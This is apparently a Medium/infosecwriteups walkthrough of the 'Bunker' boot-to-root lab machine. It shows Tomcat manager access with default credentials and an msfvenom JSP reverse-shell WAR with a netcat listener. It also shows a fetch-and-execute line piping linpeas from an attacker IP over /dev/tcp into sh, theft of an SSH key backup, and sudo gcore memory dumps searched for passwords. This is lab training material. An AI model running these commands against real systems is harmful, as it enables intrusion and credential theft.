• 5
    3
    4
infosecwriteups.com

Walkthrough of the Bunker Machine on VulnX Platform: Medium Difficulty Boot to Root

AAKASH SHARMA
8–10 minutes

AAKASH SHARMA

Introduction

Welcome to this in-depth walkthrough of the Bunker machine on the VulnX platform! In this guide, we’ll explore a comprehensive approach to conquering the Bunker machine, which is set at a medium difficulty level. Whether you’re a seasoned penetration tester or an aspiring cybersecurity enthusiast, this walkthrough is designed to enhance your skills and provide valuable insights into the boot-to-root process.

About the Bunker Machine

The Bunker machine presents a well-rounded challenge, combining various aspects of cybersecurity from initial access to privilege escalation. It offers a balanced mix of vulnerability assessment and exploitation techniques, making it an excellent exercise for those looking to sharpen their penetration testing abilities.

Objective

The goal of this walkthrough is to guide you through the entire process of compromising the Bunker machine, from discovering initial vulnerabilities to achieving root access. We’ll cover every step in detail, ensuring you understand the techniques and tools used along the way.

What You’ll Learn

  1. Initial Reconnaissance: How to gather information about the target machine to identify potential attack vectors.
  2. Vulnerability Exploitation: Techniques for exploiting discovered vulnerabilities to gain initial access.
  3. Privilege Escalation: Methods to escalate privileges from a standard user to root, leveraging misconfigurations and weaknesses.
  4. Post-Exploitation: Strategies for securing and maintaining access, as well as cleanup processes.

Prerequisites

Before diving into this walkthrough, ensure you have a basic understanding of penetration testing methodologies, common security tools, and Linux command-line operations. Familiarity with tools like nmap, netcat, socat, and gcore will be beneficial.

Walkthrough by Aakash Sharma

This detailed guide is authored by Aakash Sharma, a cybersecurity professional with a passion for ethical hacking and security research. Aakash brings a wealth of experience in penetration testing and a deep understanding of the techniques required to tackle medium-difficulty challenges like the Bunker machine.

start the machine

1. Initial Reconnaissance

Start by scanning the target server to identify open ports and services. For this, nmap is an essential tool. Begin with a basic scan to discover open ports:

nmap -p- [target-ip]

80 Port Running.

  1. Entry in

sudo vim /etc/hosts

Press enter or click to view image in full size

3. The Unknown service is Running on Port 8080 SCTP

  • Install ncat if Not Already Installed:

On Debian-based systems (like Ubuntu), you can install it using:

sudo apt-get install ncat

On Red Hat-based systems, use:

sudo yum install ncat

  • Connect to the SCTP Service:

Use ncat to connect to the SCTP service on port 8080:

ncat --sctp [target-ip] 8080

Replace [target-ip] with the IP address of the target machine.

Press enter or click to view image in full size

Using cat commend

4.

Understanding the

socat

Command

  • socat: A command-line utility that establishes two bidirectional byte streams and transfers data between them.
  • TCP-LISTEN:8081,fork: This tells socat us to listen on TCP port 8081. The fork option allows socat to handle multiple connections simultaneously by creating a new process for each connection.
  • SCTP:192.168.29.116:8080: This specifies that the data received on the TCP port should be forwarded to an SCTP service running on IP address 192.168.29.116 on port 8080.

Setting Up Traffic Forwarding

Here’s how to set up and use the socat command for forwarding TCP traffic to an SCTP service:

1. Install

  • socat

Ensure socat is installed on your system. You can install it using your package manager:

  • On Debian-based systems (like Ubuntu):

bashCopy code

sudo apt-get install socat

  • On Red Hat-based systems (like CentOS):

sudo yum install socat

  • 2. Run the
  • socat
  • Command

To forward TCP traffic on port 8081 to an SCTP service on 192.168.29.116 port 8080, run:

socat TCP-LISTEN:8081,fork SCTP:192.168.29.116:8080

  • 3. Verify the Setup
  1. Test TCP Listening Port:

Open a new terminal and check if socat is listening on TCP port 8081:

sudo netstat -tuln | grep 8081

  • Connect to the TCP Port:

You can now connect to TCP port 8081 and it will forward traffic to the SCTP port:

nc -v localhost 8081

Press enter or click to view image in full size

5.It Works

Press enter or click to view image in full size

  • Tomcat Manager Web Application

Tomcat’s Manager Web Application often provides a straightforward path to exploit:

  1. Access the Manager Webapp: Open a web browser and navigate to http://[target-ip]:8080/manager/html. Log in using default credentials:
  2. Username: tomcat
  3. Password: tomcat

Press enter or click to view image in full size

Press enter or click to view image in full size

7. Upload a Payload: Use Metasploit’s msfvenom to generate a reverse shell payload:

Get AAKASH SHARMA’s stories in your inbox

Join Medium for free to get updates from this writer.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=[your-ip] LPORT=1337 -f war > shell.war

Deploy this shell.war to the Tomcat server using the Manager interface.

  1. Set Up a Listener: Use ncat or nc to listen for the reverse shell:

nc -nlvp 1337

Press enter or click to view image in full size

Trigger the Payload: Access the uploaded payload by navigating to http://[target-ip]:8080/shell. This should provide you with a shell.

Press enter or click to view image in full size

Press enter or click to view image in full size

They Give shell

Convert this to bin bash shell

Using SHELL=/bin/bash script -q /dev/null

Press enter or click to view image in full size

linpeas search for privilege

transport linpeas using this cmd

Preparation and Transport of

linpeas

First, we need to transport the linpeas script to the victim machine. Use netcat to transfer the file:

On the Attacker’s Machine:

# Start a netcat listener to receive the linpeas.sh file

sudo nc -q 5 -lvnp 80 < linpeas.sh

On the Victim Machine:

# Fetch and execute the linpeas.sh script via netcat

cat < /dev/tcp/10.10.10.10/80 | sh

Press enter or click to view image in full size

Found

Press enter or click to view image in full size

  • Copying the SSH Private Key for Privilege Escalation

Once linpeas has run and you have identified the SSH private key, copy it and set the appropriate permissions:

# Copy the SSH private key to the current directory

cp /var/lib/tomcat10/backups/id_rsa.bak .

# Set permissions to secure the SSH key

chmod 600 id_rsa.bak

For privilage we are import private key ssh sysadminid

Press enter or click to view image in full size

Setting Up Port Forwarding Using

socat

Open a new terminal and set up port forwarding with socat:

# Forward connections from port 2222 on the local machine to port 22 on the remote machine

socat TCP-LISTEN:2222,fork SCTP:192.168.29.116:22

and we have privilage User

Press enter or click to view image in full size

Checking User Privileges

Verify what commands the current user (sysadmin) can run with sudo:

bashCopy code

# Check sudo privileges for the current user

sudo -l

You’ll see output similar to:

plaintextCopy code

User sysadmin may run the following commands on bunker:

(root) NOPASSWD: /usr/bin/gcore

Gcore is running Go gitfobians for it

It can be used to generate core dumps of running processes. Such files often contains sensitive information such as open files content, cryptographic keys, passwords, etc. This command produces a binary file named core.$PID, that is then often filtered with strings to narrow down relevant information.

Press enter or click to view image in full size

Using

gcore

to Extract Sensitive Information

Identify processes that might contain sensitive information. For example:

# List all processes with the root user

ps -aux | grep root

Then use gcore to create a core dump of a specific process (replace PID with the actual process ID you are interested in):

bashCopy code

# Generate a core dump for a specific process

sudo gcore <PID>

Note: If gcore fails with a message like ptrace: No such process, verify the process ID and ensure it's correct.

Finding and Using Passwords

After generating core dumps, search through the core file using tools like strings:

# Search for sensitive information in the core dump

strings core.<PID> | grep password

Finally, use the found password to escalate privileges to the root user if successful.

sysadmin@bunker:~$ head -n 30 core.394

Press enter or click to view image in full size

the password is found

Press enter or click to view image in full size

sucessfully we are root